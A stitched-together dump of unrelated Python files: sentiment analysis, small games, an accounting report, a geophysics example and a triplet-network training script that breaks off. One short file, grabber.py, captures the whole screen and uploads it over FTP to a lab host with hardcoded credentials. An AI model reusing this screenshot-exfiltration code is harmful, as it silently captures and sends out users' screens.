TweetTokenizer\nfrom nltk.tree import *\nimport csv\nimport pandas as pd\nimport collections\nimport urllib2\nimport numpy as np\nfrom sklearn import svm\nfrom sklearn.svm import SVC\n\n\n# In[2]:\n\ndef buildSlangDictionary():\n alpha = list(map(chr, range(ord('a'), ord('z')+1)))\n url = 'http://www.noslang.com/dictionary/'\n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 6.1; Win64; x64)\",\n 'Accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n 'Accept-Language': \"de,en-US;q=0.7,en;q=0.3\",\n 'Accept-Charset': \"ISO-8859-1,utf-8;q=0.7,*;q=0.3\",\n 'Accept-Encoding': 'none',\n 'Connection': \"keep-alive\"\n }\n slang_dict = collections.defaultdict(str)\n for letter in alpha:\n url = url + letter + '/'\n req = urllib2.Request(url, headers=headers)\n response = urllib2.urlopen(req)\n soup = BeautifulSoup(response)\n abbr_list = []\n for abbr in soup.findAll('abbr'):\n abbr_list.append(abbr)\n for x in abbr_list:\n temp = x.contents[0].contents[0].contents\n if isinstance(temp[0], NavigableString):\n slang = ''.join(temp)\n slang = slang.encode('ascii', 'ignore')\n slang = slang.split(' :')[0]\n meaning = x['title']\n slang_dict[slang] = meaning\n url = url[:-2]\n return slang_dict\n\n\n# In[3]:\n\ndef removeRepeatedSequence(word):\n pattern = re.compile(r'(.)\\1{1,}',re.DOTALL)\n return pattern\n\n\n# In[4]:\n\ndef getWordVector(tweet):\n wordVector = []\n with open('StopWords.txt', 'r') as f:\n stopWords = f.read().split('\\n')[1:-1]\n f.close()\n words = tweet.split()\n for word in words:\n word = removeRepeatedSequence(word)\n word = word.strip('\\'\"?,.')\n s = re.search(r'^[a-zA-Z][a-zA-Z0-9]*$', word)\n if word.lower() in stopWords or s is None:\n continue\n else:\n wordVector.append(word.lower())\n return wordVector\n \n\n\n# In[5]:\n\ndef preProcessTweet(tweet, emoji_dict):\n tweet = tweet.lower()\n negative_words = ['not','no','never','n\\'t','cannot','isn\\'t','isnt']\n tweet = re.sub(r'{(\\s)*link(\\s)*}','U',tweet)\n tweet = re.sub(r'@(\\s)*(\\w)+','@target',tweet)\n tweet = re.sub(r'[\\s]+',' ',tweet)\n tweet = re.sub(r'#(\\s)*(\\w)+',r'\\2',tweet)\n tweet = tweet.strip('\\'\"')\n \n tokeniser = TweetTokenizer() #Have to use something else as it is seperating the emoticon\n tweet_tokens = tokeniser.tokenize(tweet)\n for x in range(len(tweet_tokens)):\n token = tweet_tokens[x]\n if len(token) == 1 and ord(token) not in range(0,128):\n continue\n token = str(token)\n if token in negative_words:\n token = 'NOT'\n if token in emoji_dict:\n if emoji_dict[token] <= -3:\n token = 'EXTREMELY-NEGATIVE'\n if emoji_dict[token] > -3 and emoji_dict[token] < 0:\n token = 'NEGATIVE'\n if emoji_dict[token] == 0:\n token = 'NEUTRAL'\n if emoji_dict[token] > 0 and emoji_dict[token] < 3:\n token = 'POSITIVE'\n if emoji_dict[token] >= 3:\n token = 'EXTREMELY-POSITIVE'\n tweet_tokens[x] = token\n tweet = ' '.join(tweet_tokens)\n \n return tweet\n \n \n\n\n# In[6]:\n\ndef buildUnigramVector(tweets, wordList):\n \n features = []\n sentiment = []\n for tweet in tweets:\n sentiment = 0\n wordMap = {}\n for word in sorted(wordList):\n wordMap[word] = 0\n \n tweetWords = tweet[0]\n for w in tweetWords:\n w = removeRepeatedSequence(w)\n w = w.strip('\\'\".,?')\n if w in wordMap:\n wordMap[w] = 1\n val = wordMap.values()\n features.append(val)\n sentiment.append(tweet[1])\n unigramVector = {'unigram_vector':features, 'sentiment': sentiment}\n return unigramVector\n \n\n\n# In[ ]:\n\ndef sentiFeatures():\n slang_dict = DictionaryBuilder()\n negative_word_list =['not','no','never','n\\'t','cannot']\n train = pd.read_csv(\"train.csv\")\n\n with open('StopWords.txt', 'r') as f:\n stopWords = f.read().split('\\n')[1:-1]\n f.close()\n \n emoticon_dict = collections.defaultdict(int)\n reader = csv.reader(open('emoticons.csv', 'r'), skipinitialspace=True)\n for row in reader:\n emoticon_dict[row[0].strip()] = int(row[1])\n \n prev_tag = ''\n tree_list =[]\n feature_vector =[]\n tweets_tagged =[]\n tokenizer = TweetTokenizer()\n for line in reader:\n tweets_tagged.append(line)\n\n featureList =[]\n\n tweets =[]\n for i in range(len(train)):\n tweet = train['tweet'][i]\n sentiment = train['sentiment'][i]\n \n tweet = preProcessTweet(tweet, emoticon_dict)\n f1, f2, f3, f4, f5, f6, f7, f9, f10, f11 = 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0\n tweet_tagged = tweets_tagged[i]\n \n tokens = tokenizer.tokenize(tweet)\n tagged_dict = collections.defaultdict(str)\n \n for word in tweet_tagged:\n if len(word.split('_') == 2):\n word, tag = word.split('_')\n tagged_dict[word] = tag\n \n for j in range(len(tokens)):\n token = tokens[j]\n if token == '!':\n f11=1.0\n if prev_tag == 'polar':\n f4+=1.0\n continue\n \n if len(token) == 1 and ord(token) not in range(1, 128):\n continue\n else:\n token = str(token)\n \n if token == '@target':\n token = '||T||'\n f7+=1.0\n prev_tag = 'target'\n continue\n if token == 'U':\n token = '||U||'\n f7+=1.0\n prev_tag = 'link'\n continue\n if token.startswith('#'):\n f4+=1.0\n f7+=1.0\n prev_tag = 'hash'\n continue\n \n if not (re.match(r'a-zA-Z', token) != None or token != removeRepeatedSequence(token)):\n prev_tag = 'emp'\n continue\n \n if token in stopWords:\n prev_tag = 'stop'\n continue\n \n if token.lower() in slang_dict:\n prev_tag = 'slang'\n token = slang_dict[token.lower()]\n f6+=1.0\n continue\n \n if token == 'POSITIVE' or token == 'EXTREMENLY-POSITIVE' or token == 'NEGATIVE' or token == 'EXTREMELY-NEGATIVE':\n f3+=1.0\n continue\n \n if token == 'NOT':\n f2+=1.0\n continue\n \n synsets = swn.senti_synsets(token)\n if len(synsets) > 0:\n \n score = max([synset.pos_score(), synset.neg_score(), synset.obj_score()])\n if synset.pos_score() == synset.neg_score() or synset.obj_score() == score:\n score = 0.0\n if synset.pos_score() < synset.neg_score():\n score = -score\n \n if score != 0.0:\n prev_tag = 'polar'\n f2+=1.0\n if token.isupper() == True:\n f4+=1.0\n f11=1.0\n \n f8 = {}\n if token in tagged_dict and (tagged_dict[token] == 'JJ' or tagged_dict[token] == 'RB' or tagged_dict[token] == 'VB' or tagged_dict[token] == 'NN'): \n f1+=1.0\n f8[tagged_dict[token]]+=score\n else:\n f9+=score\n else:\n prev_tag = 'non-polar'\n if token in tagged_dict and (tagged_dict[token] == 'JJ' or tagged_dict[token] == 'RB' or tagged_dict[token] == 'VB' or tagged_dict[token] == 'NN'): \n f5 += 1.0\n if token.isupper():\n f10 += 1.0\n f11 = 1.0\n continue\n else:\n prev_tag = 'non-polar'\n if token in tagged_dict and (tagged_dict[token] == 'JJ' or tagged_dict[token] == 'RB' or tagged_dict[token] == 'VB' or tagged_dict[token] == 'NN'): \n f5 += 1.0\n if token.isupper():\n f10 += 1.0\n f11 = 1.0 \n continue\n tweet = ' '.join(tokens)\n word_vector = getWordVector(tweet)\n \n \n \n\n\n# In[ ]:\n\nfrom nltk.tag import StanfordPOSTagger\nst = StanfordPOSTagger('english-bidirectional-distsim.tagger') \n\n","sub_path":"agarwal/Twitter_Sentiment_Analysis/Agarwal.py","file_name":"Agarwal.py","file_ext":"py","file_size_in_byte":9251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"571386213","text":"# Rock Paper Python V1.0\n# Written by Briana Morgan 6/4/20\n# Standard rock paper scissors game with two AI modes, best out of three rounds. Random mode will choose a random selection.\n# Smart mode will base its choice on statistics. The strategy is based on experiments of Zhejiang University.\n\nimport random\n\n#Variable declaration\n\nuserScore = 0\nCPUScore = 0\noptions = ['rock' , 'paper' , 'scissors']\ngameModes = ['random' , 'smart']\nuserLastChoice = None\nbeats={\n \"rock\": \"scissors\",\n \"paper\": \"rock\",\n \"scissors\": \"paper\"\n}\n\n#functions\ndef coreLogic(CPU,User):\n if User == CPU :\n return \"tie\"\n if beats[CPU] == User:\n return \"lose\"\n else:\n return \"win\"\n\ndef randomMode():\n CPUChoice = random.choice(options) \n print(\"CPU chose \" + CPUChoice)\n return CPUChoice\n\ndef smartMode():\n CPUChoice = beats[userLastChoice]\n print(\"CPU chose \" + CPUChoice)\n return CPUChoice\n \ndef resultProcess(result) :\n global userScore\n global CPUScore\n if result == 'win' :\n print(\"You won!\")\n userScore +=1\n if result == 'tie' :\n print(\"You tied!\")\n if result == 'lose' :\n print(\"You Lost!!\")\n CPUScore +=1\n \ndef scoreProcess() :\n if userScore == 2 :\n print(name + \" won 2 out of three rounds! You're awesome!\")\n exit()\n elif CPUScore == 2 :\n print(name + \" lost out of three rounds! Oh, dear...\")\n exit()\n\ndef inputValidate(choice) :\n if choice not in options :\n raise Exception('Invalid choice')\n return choice\n\n#collect input options\nprint(\"Welcome to Briana's Rock Paper Scissors Game!\")\nprint(\"Please enter your name:\")\nname = input()\nprint(\"Hello \" + name)\nprint (f\"Please select difficulty: {gameModes}\")\nDifficulty = input()\n#validate input\nif Difficulty not in gameModes :\n raise Exception('Invalid difficulty')\n\n#collect first round\nprint(\"This game is best out of 3 rounds. Please make your first choice.\")\nroundNumber = 1\nwhile roundNumber < 4:\n print(\"Round number:\",roundNumber,\"Your Score:\",userScore,\"CPU Score:\",CPUScore)\n print(f\"Options are {options}\")\n choice = inputValidate( input() )\n \n if Difficulty == 'random':\n CPUChoice = randomMode()\n resultProcess( coreLogic(CPUChoice,choice) )\n\n if Difficulty == 'smart':\n if roundNumber == 1:\n CPUChoice = randomMode()\n resultProcess( coreLogic(CPUChoice,choice) )\n else: \n CPUChoice = smartMode()\n resultProcess( coreLogic(CPUChoice,choice) )\n\n roundNumber +=1\n scoreProcess()\n userLastChoice = choice\n\n#find out who won or if tie\nif CPUScore > userScore :\n print(name + \" lost out of three rounds! Yikes.\")\nelif CPUScore == userScore :\n print(name + \" and CPU tied! Please play again :)\")\nelse :\n print(name + \" won best out of three rounds! Way to go!\")\n","sub_path":"RockPaper.py","file_name":"RockPaper.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"187856711","text":"#Used trademark of FastMonkeys\n#Jumping sound is credited do Dklon\n\nimport pygame as pg\nimport random\nfrom Settings import *\nfrom Sprites import *\nfrom os import path\nfrom os import getcwd\n\nclass Game:\n def __init__(self):\n # initialize game window, etc\n pg.init()\n pg.mixer.init()\n pg.mixer.init()\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(TITLE)\n self.clock = pg.time.Clock()\n self.obstacle_speed = STARTING_SPEED\n self.running = True\n self.load_data()\n self.obstacles_jumped = -1 \n self.sys_font = pg.font.SysFont(\"None\", size=50)\n self.sys_font.render(\"Obstacles jumped: \", 0, (255,255,255))\n\n def load_data(self):\n self.dir = path.dirname(__file__) \n self.assets_dir = path.join(self.dir, \"Assets\")\n self.obstacles_spritesheet = Spritesheet(path.join(self.assets_dir, OBSTACLES_SPRITESHEET))\n self.monkey_spritesheet = Spritesheet(path.join(self.assets_dir, MONKEY_SPRITESHEET))\n self.jump_sound = pg.mixer.Sound(path.join(self.assets_dir, \"jump_03.wav\"))\n\n\n def new(self):\n # start a new game\n self.obstacles_jumped = -1\n self.obstacle_speed = STARTING_SPEED\n self.all_sprites = pg.sprite.Group()\n self.platform_sprites = pg.sprite.Group()\n self.obstacle_sprites = pg.sprite.Group()\n self.player = Monkey(self)\n self.ground = Ground()\n #self.obstacle = Obstacle(self, -5, 0) #poczatkowa przeszkoda\n self.spawn_obstacle()\n self.all_sprites.add(self.ground)\n self.platform_sprites.add(self.ground)\n self.all_sprites.add(self.player)\n self.run()\n\n def spawn_obstacle(self):\n self.set_obstacle_speed()\n self.obstacle = None\n self.obstacle = Obstacle(self, self.obstacle_speed, 0)\n self.all_sprites.add(self.obstacle)\n self.obstacle_sprites.add(self.obstacle)\n self.obstacles_jumped += 1\n\n def set_obstacle_speed(self):\n if self.obstacles_jumped % CHANGE_OBSTACLE_SPEED_EVERY_N == 0 :\n self.obstacle_speed *= 1.1 \n\n def get_obstacles_jumped_caption(self):\n obst_jumped = self.sys_font.render(\"Obstacles jumped: \" + str(self.obstacles_jumped) , 0, (255,255,255))\n return obst_jumped\n\n def get_speed_caption(self):\n speed_calc = (self.obstacle_speed/STARTING_SPEED) * 100\n return self.sys_font.render(\"Current speed: \" + str(int(speed_calc)) + \"%\" , 0, (255,255,255))\n\n def run(self):\n # Game Loop\n self.show_start_screen()\n self.playing = True\n while self.playing:\n self.clock.tick(FPS)\n self.events()\n self.update()\n self.draw()\n\n def update(self):\n # Game Loop - Update\n \n self.all_sprites.update()\n platform_hits = pg.sprite.spritecollide(self.player, self.platform_sprites, dokill=False)\n if platform_hits:\n self.player.pos.y = platform_hits[0].rect.top\n self.player.walking = True\n self.player.vel.y = 0 \n #detect collision with obstacle and kill player\n obstacle_hits = pg.sprite.spritecollide(self.player, self.obstacle_sprites, dokill=False)\n if obstacle_hits:\n self.write_highest_score()\n self.playing = False\n\n #spawn new obstacle once old one disappears \n if self.obstacle.rect.right < 0:\n self.spawn_obstacle()\n\n def write_highest_score(self):\n if self.obstacles_jumped >self.read_highest_score():\n with open(path.join(getcwd(), HIGHSCORE), 'w') as f :\n f.write(str(self.obstacles_jumped))\n\n \n def read_highest_score(self):\n try:\n with open(path.join(getcwd(), HIGHSCORE), 'r') as f :\n highscore = int(f.read())\n except:\n highscore = 0\n return highscore \n\n def events(self):\n # Game Loop - events\n for event in pg.event.get():\n # check for closing window\n if event.type == pg.QUIT:\n if self.playing:\n self.playing = False\n self.running = False\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_SPACE:\n self.player.jump()\n\n def draw(self):\n # Game Loop - draw\n self.screen.fill(BLACK)\n #draw captions\n self.screen.blit(self.get_obstacles_jumped_caption(), (20, 50))\n self.screen.blit(self.get_speed_caption(), (20, 100))\n #draw sprites\n self.all_sprites.draw(self.screen)\n # *after* drawing everything, flip the display\n pg.display.flip()\n\n def show_start_screen(self):\n highscore = self.read_highest_score()\n self.screen.fill(LIGHTBLUE)\n logo = pg.image.load(path.join(self.assets_dir, \"logo-fastmonkeys.png\"))\n self.screen.blit(logo, (WIDTH/2 - 115, 40))\n self.draw_text(\"Press spacebar to start a new game\", BLACK, WIDTH/2, HEIGHT/4)\n self.draw_text(\"Highscore \" + str(highscore), BLACK, WIDTH/2, HEIGHT/3)\n pg.display.flip()\n waiting = True\n while waiting:\n self.clock.tick(FPS)\n for e in pg.event.get():\n if e.type == pg.KEYDOWN:\n if e.key == pg.K_SPACE:\n waiting = False\n \n if e.type == pg.QUIT:\n waiting = False\n self.running = False\n \n \n def draw_text(self, text, color, x, y):\n text_surface = self.sys_font.render(text, True, color)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x,y)\n self.screen.blit(text_surface, text_rect)\n\n def show_go_screen(self):\n # game over/continue\n pass\n\ng = Game()\ng.show_start_screen()\nwhile g.running: \n g.new()\n \n\npg.quit()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"318186344","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 16 13:35:52 2019\r\n\r\n@author: arje\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cloudpickle as pickle\r\nfrom datetime import timedelta\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\n\r\n\"\"\"\r\nReading in the new Detect data\r\n\"\"\"\r\nseed=[12,3491,6054,9852,333,7878,5555,497,103053,45645]\r\n\r\nexpo=[1000,1500,2000]\r\naperture=[3.8,8,16]\r\n\r\nres = {}\r\nres['Exposure']=[]\r\nres['Aperture']=[]\r\nres['Test accuracy']=[]\r\nres['std(Test accuracy)']=[]\r\nfor ex in expo:\r\n for ap in aperture:\r\n res['Exposure'].append(str(ex))\r\n res['Aperture'].append(ap)\r\n fo='./data/Expo_'+str(ex)+'_Ap_'+str(ap)\r\n \r\n acc=[]\r\n time=[]\r\n for ind, se in enumerate(seed):\r\n fid=open(fo+'/'+str(se)+'_sum_res_iv.pickle','rb')\r\n acc.append(pickle.load(fid)['test_sum_accuracy'])\r\n fid.close()\r\n\r\n res['Test accuracy'].append(np.mean(acc))\r\n res['std(Test accuracy)'].append(np.std(acc))\r\n \r\nfid=open('./iv3_sum_results.pickle','wb')\r\npickle.dump(res,fid)\r\nfid.close()\r\n\r\n#fid=open('./iv3_results.pickle','rb')#inceptionV3\r\n#fid=open('./clean_data_results.pickle','rb')#resnet50\r\n#res=pickle.load(fid)\r\n#fid.close()\r\n#res\r\n\r\n#acc1000=np.array(res['Test accuracy'][0:3])\r\n#std1000=np.array(res['std(Test accuracy)'][0:3])\r\n#acc1500=np.array(res['Test accuracy'][3:6])\r\n#std1500=np.array(res['std(Test accuracy)'][3:6])\r\n#acc2000=np.array(res['Test accuracy'][6:9])\r\n#std2000=np.array(res['std(Test accuracy)'][6:9])\r\n\r\n\r\n#Let's move the aperture around a bit for a prettier picture\r\n#res['Aperture']=[3.5,7.7,15.7,3.8,8,16,4.1,8.3,16.3]\r\n\r\n#fig, ax = plt.subplots()\r\n#ax.plot(aperture, acc1000)\r\n#ax.fill_between(aperture, acc1000+std1000, acc1000-std1000, alpha=0.5)\r\n#ax.errorbar(res['Aperture'][0:3], acc1000, yerr=2*std1000, fmt='o')\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='Camera settings results')\r\n#ax.legend(loc='lower left',title='Exposure')\r\n#ax.plot(aperture, acc1500)\r\n#ax.fill_between(aperture, acc1500+std1500, acc1500-std1500, alpha=0.5)\r\n#ax.errorbar(res['Aperture'][3:6], acc1500, yerr=2*std1500, fmt='o')\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='Camera settings results')\r\n#ax.plot(aperture, acc2000)\r\n#ax.fill_between(aperture, acc2000+std2000, acc2000-std2000, alpha=0.5)\r\n#ax.errorbar(res['Aperture'][6:9], acc2000, yerr=2*std2000, fmt='o')\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='Camera settings results')\r\n\r\n\r\n\r\n#import pandas as pd\r\n#df=pd.DataFrame(res)\r\n\r\n#fig, ax = plt.subplots() # 1\r\n#ax.legend(loc='best',title='Exposure',bbox_to_anchor=(0.5, 0.7))\r\n#ax.set(xlabel='Aperture', ylabel='Test accuracy',\r\n# title='InceptionV3')\r\n#ax.get_legend().set_bbox_to_anchor((.8532,.3))\r\n#ax.set_ylim(0.88, 0.99)\r\n#for key, group in df.groupby('Exposure'):\r\n# group.plot('Aperture', 'Test accuracy', yerr='std(Test accuracy)', label=key, ax=ax)\r\n#\r\n#fig.savefig('./camera_settings_results_iv3.png')\r\n#plt.show()\r\n","sub_path":"Johanna/iv3_sum_results.py","file_name":"iv3_sum_results.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"407245207","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\nfrom report import report_sxw\nimport time\nfrom datetime import datetime\nimport pooler\n\nclass account_statement_parser(report_sxw.rml_parse):\n def __init__(self, cr, uid, name, context):\n super(account_statement_parser, self).__init__(cr, uid, name, context=context)\n self.localcontext.update({\n 'time': time,\n 'getLines': self._lines_get,\n 'getBalance': self._get_total_balance,\n })\n self.context = context\n self.client_balances = {}\n \n def _get_total_balance(self, partner):\n return self.client_balances[partner]\n \n def set_context(self, objects, data, ids, report_type=None):\n partners_ref = self.pool.get('res.partner')\n if 'active_ids' in data:\n ids = data['active_ids']\n else:\n ids = partners_ref.search(self.cr, self.uid, [])\n\n objects = partners_ref.browse(self.cr, self.uid, ids)\n objects = [obj for obj in objects if obj.customer or obj.supplier]\n return super(account_statement_parser, self).set_context(objects, data, ids , report_type=report_type)\n \n def get_name(self, moveline):\n if moveline.move_id.name == '/':\n return moveline.name\n else:\n return moveline.move_id.name\n \n def get_move_lines(self, moveline, moveline_ids):\n '''\n Get movelines related to the moveline selected\n '''\n moveline_obj = pooler.get_pool(self.cr.dbname).get('account.move.line')\n list = []\n movelines = moveline_obj.browse(self.cr, self.uid, moveline_ids)\n list = [line for line in movelines if line.move_id.id == moveline.move_id.id]\n return list\n \n def get_type(self, moveline):\n '''\n Get type of document\n '''\n invoice_obj = pooler.get_pool(self.cr.dbname).get('account.invoice')\n invoice_id = invoice_obj.search(self.cr, self.uid, [('move_id','=',moveline.move_id.id)])\n \n # filter invoices to map money sales\n if invoice_id:\n invoice = invoice_obj.browse(self.cr, self.uid, invoice_id)[0]\n # map money sales\n if invoice.type == 'out_money_sale' or invoice.type == 'in_money_sale':\n return _('Money Sale')\n type=''\n if moveline.journal_id.type in ('sale_refund', 'purchase_refund'):\n type = _('Credit Note')\n elif moveline.journal_id.type in ('sale', 'purchase'):\n if not moveline.advance_id:\n type= _('Invoice')\n else:\n type = _('Advance')\n elif moveline.journal_id.type in ('cash', 'bank'):\n type = _('Receipt')\n\n return type\n \n def _lines_get(self, partner, data):\n result = []\n balance_paid = 0.0\n moveline_obj = pooler.get_pool(self.cr.dbname).get('account.move.line')\n invoice_obj = pooler.get_pool(self.cr.dbname).get('account.invoice')\n movelines = []\n type=[]\n\n if data['result_selection'] == 'supplier':\n type = ['payable']\n elif data['result_selection'] == 'customer':\n type = ['receivable']\n else:\n type= ['receivable', 'payable']\n \n condictions = [('account_id.type', 'in', type), ('partner_id', '=', partner.id),\n ('state', '<>', 'draft'), ('state', '<>', 'cancel')]\n \n if data['date_from'] or data['date_to']:\n if data['date_from']:\n condictions += [('date','>=',data['date_from'])]\n if data['date_to']:\n condictions += [('date','<=',data['date_to'])]\n \n elif data['period_from'] or data['period_to']:\n periods_ref = pooler.get_pool(self.cr.dbname).get('account.period')\n if data['period_from']:\n condictions += [('date','>=', periods_ref.browse(self.cr,self.uid, data['period_from'][0]).date_start)]\n if data['period_to']:\n condictions += [('date','<=', periods_ref.browse(self.cr,self.uid,data['period_to'][0]).date_stop)]\n \n movelines = moveline_obj.search(self.cr, self.uid, condictions, order = 'date')\n rel_movelines = []\n processed_movelines = []\n \n _res = []\n balance_paid = 0.0\n \n this_company = self.pool.get('res.users').browse(self.cr, self.uid, self.uid).company_id\n \n for moveline in moveline_obj.browse(self.cr, self.uid, movelines):\n if moveline in processed_movelines:\n continue\n \n rel_movelines = self.get_move_lines(moveline, movelines)\n processed_movelines = processed_movelines + rel_movelines\n \n moveline_type = self.get_type(moveline)\n \n if moveline_type == '':\n continue\n \n inline = {'date': moveline.date,\n 'doc': moveline_type + ' ' + self.get_name(moveline),\n 'curr': this_company.currency_id.symbol,\n 'exch': 100.0, #Alterar\n 'exch_dif': 0.0, #Alterar\n 'disc': 0.0,\n 'debit': 0.0,\n 'credit': 0.0,\n 'balc': 0.0,\n 'id': moveline.id,\n }\n \n #get discount--------------\n invoice_id = invoice_obj.search(self.cr, self.uid, [('move_id','=',moveline.move_id.id)])\n if invoice_id:\n invoice = invoice_obj.browse(self.cr, self.uid, invoice_id)[0]\n for invoice_line in invoice.invoice_line:\n inline['disc'] += (invoice_line.discount/100) * (invoice_line.price_unit * invoice_line.quantity)\n #--------------------------\n\n credit_rec = 0.0\n debit_rec = 0.0\n credit = moveline.credit\n debit = moveline.debit\n \n if len(rel_movelines)>1:\n for line in rel_movelines:\n if line.credit:\n credit_rec += line.credit\n else:\n debit_rec += line.debit\n credit = credit_rec\n debit = debit_rec\n \n inline['debit'] += debit\n inline['credit'] += credit\n \n balance_paid += inline['debit'] + (inline['credit'] * -1)\n inline['balc'] = balance_paid\n _res.append(inline)\n \n self.client_balances[partner] = balance_paid\n _res.sort(key=lambda x: datetime.strptime(x['date'], '%Y-%m-%d'))\n return _res\n\n\nreport_sxw.report_sxw('report.single.account.statement', 'res.partner',\n 'tko_account_reports_ao/report/single_account_statement.rml', parser=account_statement_parser, header=\"external\")\n\nreport_sxw.report_sxw('report.multi.account.statement', 'res.partner',\n 'tko_account_reports_ao/report/multi_account_statement.rml', parser=account_statement_parser, header=\"internal\")\n\nreport_sxw.report_sxw('report.single.account.statement.simple', 'res.partner',\n 'tko_account_reports_ao/report/single_account_statement_simple.rml', parser=account_statement_parser, header=\"external\")\n\nreport_sxw.report_sxw('report.multi.account.statement.simple', 'res.partner',\n 'tko_account_reports_ao/report/multi_account_statement_simple.rml', parser=account_statement_parser, header=\"internal\")","sub_path":"tko_account_reports_ao/report/account_statement.py","file_name":"account_statement.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"320491884","text":"\"\"\"\nGravMag: Forward modeling of the gravity anomaly and gravity gradient tensor\nusing spheres\n\"\"\"\nfrom fatiando import mesher, gridder, gravmag\nfrom fatiando.vis import mpl\n\nspheres = [mesher.Sphere(0, 0, 2000, 1000, {'density':1000})]\narea = (-5000, 5000, -5000, 5000)\nshape = (100, 100)\nx, y, z = gridder.regular(area, shape, z=-100)\ngz = gravmag.sphere.gz(x, y, z, spheres)\ntensor = [gravmag.sphere.gxx(x, y, z, spheres),\n gravmag.sphere.gxy(x, y, z, spheres),\n gravmag.sphere.gxz(x, y, z, spheres),\n gravmag.sphere.gyy(x, y, z, spheres),\n gravmag.sphere.gyz(x, y, z, spheres),\n gravmag.sphere.gzz(x, y, z, spheres)]\nmpl.figure()\nmpl.axis('scaled')\nmpl.title('gz')\nmpl.contourf(y, x, gz, shape, 15)\nmpl.colorbar()\nmpl.m2km()\nmpl.figure()\ntitles = ['gxx', 'gxy', 'gxz', 'gyy', 'gyz', 'gzz']\nfor i, field in enumerate(tensor):\n mpl.subplot(2, 3, i + 1)\n mpl.axis('scaled')\n mpl.title(titles[i])\n levels = mpl.contourf(y, x, field, shape, 15)\n mpl.colorbar()\n mpl.m2km()\nmpl.show()\n","sub_path":"cookbook/gravmag_grav_sphere.py","file_name":"gravmag_grav_sphere.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598553277","text":"# screen shot grabber \n\nimport wx # pip install wxpython\nimport os\nimport ftplib\n\nw = wx.App()\nscreen = wx.ScreenDC()\nsize = screen.GetSize()\nbmap = wx.Bitmap(size[0],size[1])\nmemo = wx.MemoryDC(bmap)\nmemo.Blit(0,0,size[0],size[1],screen,0,0)\n\ndel memo\nbmap.SaveFile(\"grabbed.png\", wx.BITMAP_TYPE_PNG)\n\nsess_ = ftplib.FTP(\"192.168.0.1\",\"msfadmin\",\"msfadmin\") #ftp server running on metsploitable2\nfile_ = open(\"grabbed.png\", \"rb\")\nsess_.storebinary(\"STOR /tmp/grabbed.png\", file_)\n\nfile_.close()\nsess_.quit()","sub_path":"grabber.py","file_name":"grabber.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"334213047","text":"from argparse import ArgumentParser\nimport chainer\nfrom src.resnet import ResNet49Layers\nfrom chainer.training import extensions\n\nfrom src.dataset import LabelHandler\nfrom src.data_loader import SortedImageDatasetBuilder\nfrom tripletembedding.predictors.tripletnet import TripletNet\nfrom tripletembedding.iterators import TripletIterator\n\n\ndef run_train():\n parser = ArgumentParser()\n parser.add_argument('--paths', type=str, nargs='+', required=True,\n help='Root paths of folders that contain images and pascal voc files')\n parser.add_argument('--label_names', type=str, required=True,\n help='Path to label names file')\n parser.add_argument('--training_splitsize', type=float, default=0.9,\n help='Splitsize of training data')\n parser.add_argument('--batchsize', type=int, default=20,\n help='Learning minibatch size')\n parser.add_argument('--epoch', type=int, default=10,\n help='Numbers of epochs to train')\n parser.add_argument('--gpu', type=int, default=0,\n help='GPU ID, negative value indicates CPU')\n parser.add_argument('--out', default='trainer_output',\n help='Output directory of trainer')\n parser.add_argument('--val_batchsize', type=int, default=250,\n help='Validation minibatch size')\n parser.add_argument('--pretrained_model', type=str, default=None)\n args = parser.parse_args()\n\n tn = TripletNet(cnn=ResNet49Layers, kwargs={'pretrained_model': args.pretrained_model})\n if args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n tn.to_gpu()\n\n label_handler = LabelHandler(args.label_names)\n builder = SortedImageDatasetBuilder(args.paths, label_handler)\n train_dataset, val_dataset = builder.get_sorted_image_dataset_split(args.training_splitsize)\n\n train_iter = TripletIterator(train_dataset, args.batchsize)\n val_iter = TripletIterator(val_dataset, args.val_batchsize)\n\n # optimizer\n learning_rate = 0.01\n momentum = 0.9\n optimizer = chainer.optimizers.MomentumSGD(learning_rate, momentum)\n optimizer.setup(tn)\n\n # trainer\n updater = chainer.training.updater.StandardUpdater(train_iter, optimizer, device=args.gpu)\n trainer = 